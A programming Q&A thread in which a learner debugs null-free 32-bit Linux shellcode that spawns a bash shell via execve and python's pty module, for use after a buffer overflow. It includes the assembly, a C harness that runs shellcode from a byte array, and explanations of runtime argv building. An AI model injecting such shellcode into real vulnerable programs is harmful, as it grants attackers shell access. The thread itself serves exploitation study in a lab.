
Update: I have fixed the invalid argv array pointers that were causing the continuous loop, and have updated the assembly code. The only remaining issue is the space character that disappears on compilation.

I've been experimenting with executing shellcode after exploiting a buffer overflow on a 32-bit Linux VM. My assembly program simply uses execve to start a shell via python (I wanted to test passing arguments in execve and not just run /bin/bash). When I compile the .asm into a program it runs fine, but it does not work when I use it as shellcode. To get it to run as shellcode, I know I need to remove null bytes so that they aren't parsed as null terminators that cut my string off early.
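
As a rough illustration of the null-byte problem, here is a minimal sketch in C that scans a byte buffer for the first 0x00. The helper name `first_null_offset` and the two byte arrays are hypothetical; the encodings are written out by hand for the two ways of loading 0xb that appear in the listings in this question, so check them against your own objdump output.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical helper: index of the first 0x00 byte in buf, or -1 if none. */
long first_null_offset(const unsigned char *buf, size_t len) {
    assert(buf != NULL);
    for (size_t i = 0; i < len; i++) {
        if (buf[i] == 0x00)
            return (long)i;
    }
    return -1;
}

/* mov eax, 0xb : the 32-bit immediate is stored in full, zero bytes included */
const unsigned char MOV_EAX_IMM32[] = { 0xb8, 0x0b, 0x00, 0x00, 0x00 };

/* xor eax, eax ; mov al, 0xb : same effect on eax, no zero bytes */
const unsigned char XOR_THEN_MOV_AL[] = { 0x31, 0xc0, 0xb0, 0x0b };
```

Run over the first array the helper reports offset 2; for the second it reports -1, which is why the null-free version clears the register first and then writes only the low byte.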

For the sake of testing, I am using a template C program for executing shellcode:

#include <stdio.h>

unsigned char code[] = "shellcodegoeshere";

int main(int argc, char **argv) {
    int (*ret)() = (int(*)())code;
    ret();
}

I changed the relative addressing in my program so that it instead uses offsets from esi once the data address is popped, replaced each null with an "N" placeholder to be overwritten at runtime, and wrote 0 into those locations by xor'ing a register with itself and moving its value to those offsets.

My original program is this:

global _start
section .text

_start:
    jmp short call_shellcode

shellcode:
    pop esi
    lea ebx, [rel arg1]
    lea ecx, [rel args]
    xor edx, edx
    xor eax, eax
    mov eax, 0xb
    int 0x80

call_shellcode:
    call shellcode

    arg1 db "/usr/bin/python",0
    arg2 db "-c",0
    arg3 db "import pty; pty.spawn(",34,"/bin/bash",34,")",0

    args dd arg1, arg2, arg3, 0

and this is what it looks like after I try taking away the null bytes:

global _start
section .text

_start:
    jmp short call_shellcode

shellcode:
    pop esi
    xor eax, eax
    mov byte [esi+15], al
    mov byte [esi+18], al
    mov byte [esi+53], al
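    mov dword [esi+53+4*3], eax ; leftover terminator write for the old args table; with args commented out below, this lands past the end of the data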
    lea ebx, [esi]
    ;lea ecx, [esi+54] (couldn't be accessed via shellcode)
    xor ecx, ecx
    push ecx
    lea ecx, [esi+19] ; now will make an array of pointers that can still be accessed via shellcode
    push ecx
    lea ecx, [esi+16]
    push ecx
    lea ecx, [esi]
    push ecx
    mov ecx, esp
    xor edx, edx
    mov al, 0xb
    int 0x80

call_shellcode:
    call shellcode

    arg1 db "/usr/bin/pythonN"
    arg2 db "-cN"
    arg3 db "import pty; pty.spawn(",34,"/bin/bash",34,")N"

    ;args dd arg1, arg2, arg3, "NNNN" (these addresses were set at compilation meaning they were no longer valid when in shellcode)
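
The placeholder offsets used in the listing above can be cross-checked with a small helper. This is only a sketch in C, assuming the data after the call is exactly the three strings laid end to end with nothing in between; `nth_marker_offset` and `ARG_BLOB` are hypothetical names introduced for illustration.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical helper: offset of the n-th (0-based) occurrence of marker
   in blob, or -1 if blob contains fewer than n+1 occurrences. */
long nth_marker_offset(const char *blob, char marker, int n) {
    assert(blob != NULL && n >= 0);
    for (size_t i = 0; blob[i] != '\0'; i++) {
        /* n is only decremented when the current byte is a marker */
        if (blob[i] == marker && n-- == 0)
            return (long)i;
    }
    return -1;
}

/* The three argument strings from the listing, concatenated as the
   assembler would lay them out (assumption: no padding between them). */
const char ARG_BLOB[] =
    "/usr/bin/pythonN"
    "-cN"
    "import pty; pty.spawn(\"/bin/bash\")N";
```

For this blob the three placeholders sit at offsets 15, 18 and 53, which agrees with the [esi+15], [esi+18] and [esi+53] stores, and arg2 and arg3 start at 16 and 19. Those numbers only hold while every byte of the strings is present; if one byte is lost from arg3, the last placeholder moves to offset 52 and the store at 53 lands one byte after it.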

When looking at my original program, reading from esi looks like this before the execve call:

enter image description here

However in my modified shellcode with no null bytes, reading from esi looks like this before and after replacing chars, prior to the execve call:

Before:

enter image description here

After:

enter image description here

As you can see, for some reason the space after "import" in "import pty" disappears; the 0x20 is even missing from the shellcode when I look at it byte by byte. When this happens, my code reaches the end of main in C and loops again, repeating the shellcode instructions. I've tried manually adding the 0x20 back, and even though the strings read from esi then match those of my working original program, I still get this loop in gdb: the interrupt doesn't start python successfully, so execution keeps going back to the start via the call to my pop instruction:

enter image description here

I know that when the call to execve is successful I shouldn't reach that bottom instruction. Judging by the missing space character, and the fact that I get a continuous loop even when it's present, I know I've done something wrong going from my original program to this one without null bytes. I just don't know what it is.

This is what I can read from esi just after the pop:

enter image description here

If anybody could help it would be greatly appreciated. Thanks.

  • args holds the addresses of each arg at assembly time (constant). You might need to load the args array with each arg at runtime. Commented Mar 3, 2022 at 20:34
  • Would loading them at runtime mean referring to each arg by [esi+xx] as I'm doing to load execve's filename, as that offset will surely stay the same? It would make sense that my original program works when compiled but the shellcode version doesn't, as the addresses in their current form may be no longer relevant... Commented Mar 3, 2022 at 21:02
  • I've loaded them at runtime like suggested and execve now runs, now the only issue is the disappearing space char... Commented Mar 3, 2022 at 21:43
  • [rel arg1] is only meaningful in 64-bit mode; 32-bit mode doesn't support RIP-relative addressing, so abs is the only possibility. Hence the jmp/call/pop trick, instead of just jmp/lea (with the code after the strings so the LEA can use a negative rel32). Commented Mar 4, 2022 at 9:55
  • Use strace ./a.out to see what system call you're making. If it doesn't work, use GDB to single-step your asm and find out exactly how your registers / memory got into the wrong state you can see with strace. Commented Mar 4, 2022 at 9:56

1 Answer


Failure to invoke Python

The execve syscall is not working properly because args is populated with constant addresses at assembly-time. args must instead be filled with addresses at runtime. In this case, that can be achieved using addresses relative to esi.
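
The same idea can be sketched in C: the pointer table is computed from a base address known only at runtime plus fixed offsets, much like the [esi+0], [esi+16] and [esi+19] addresses the shellcode pushes. The function `build_argv` and its parameters are hypothetical, and the offsets are assumed to match the string layout in the question.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical helper: fill argv with base + offsets[i] for each argument
   and terminate it with NULL. argv must have room for count + 1 entries. */
void build_argv(char *base, const size_t *offsets, size_t count, char **argv) {
    assert(base != NULL && offsets != NULL && argv != NULL);
    for (size_t i = 0; i < count; i++)
        argv[i] = base + offsets[i];   /* address resolved at runtime */
    argv[count] = NULL;                /* execve expects a NULL terminator */
}
```

Because every entry is derived from `base` when the code runs, the table stays valid wherever the bytes end up in memory, which is not true of addresses baked in by the assembler.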

Missing space characters

The space characters aren’t missing; they were never there in the first place. Spaces are how shells separate arguments. execve doesn’t separate arguments with anything, because each argument is its own string somewhere in memory. The fact that your three strings are all consecutive in memory and can be printed as one long string is simply a detail of your implementation, and is not a requirement of execve.

Loop

When the execve syscall fails, execution continues to the next instruction:

call shellcode

If you let this run long enough, you’d get a stack overflow from the number of calls.
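
The fall-through behaviour is easy to reproduce from C, since execve only returns when it fails. A minimal sketch, assuming a Linux system; `exec_or_errno` is a hypothetical wrapper, not part of any library.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>
#include <unistd.h>

/* Hypothetical wrapper: try to execve path with an empty environment.
   On success this never returns, because the process image is replaced.
   On failure execve returns -1 and the caller simply carries on, so the
   wrapper reports errno to show what went wrong. */
int exec_or_errno(const char *path, char *const argv[]) {
    assert(path != NULL && argv != NULL);
    char *const envp[] = { NULL };
    execve(path, argv, envp);
    return errno;   /* only reached if execve failed */
}
```

Calling it with a path that does not exist returns ENOENT instead of replacing the process. Shellcode often follows the int 0x80 with an exit syscall for the same reason, so that a failed execve ends the process rather than running into whatever bytes come next.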


4 Comments

Thanks for the help, I was able to change to relative addresses. However, when mentioning a missing space I wasn't referring to the one between "-c" and "import". I know there are no space chars between the consecutive strings in memory, I wasn't referring to any spaces between execve's args. What I'm referring to is the value of the last arg itself: "import pty; pty.spawn('/bin/bash')". The string itself should contain spaces, there's a space character after the semicolon, but not one after import. Am I making sense or am I missing something?
I misunderstood and missed the actual missing space. I’ll look into it…
I tested your code on my x86 musl-based Linux system and did not see the space disappear. I did replace /usr/bin/python with /bin///////echo, because I don’t have Python installed. In your screenshot, the N at the end of the python script isn’t replaced. Maybe you replaced the wrong character?
The N isn't replaced as my offset is expecting the missing space to be there, so it instead sets null one byte after the N. I tried using /bin///////echo and I still get the same result. I don't think it's a matter of replacing the wrong character either because this space is missing right after I pop esi before any of the mov's are executed (I've updated my question with a screenshot). The missing char shows in objdump too so it's not the shellcode parsing. At least for now I can manually add the 0x20 back into the shellcode, but it's a bit of a janky solution.
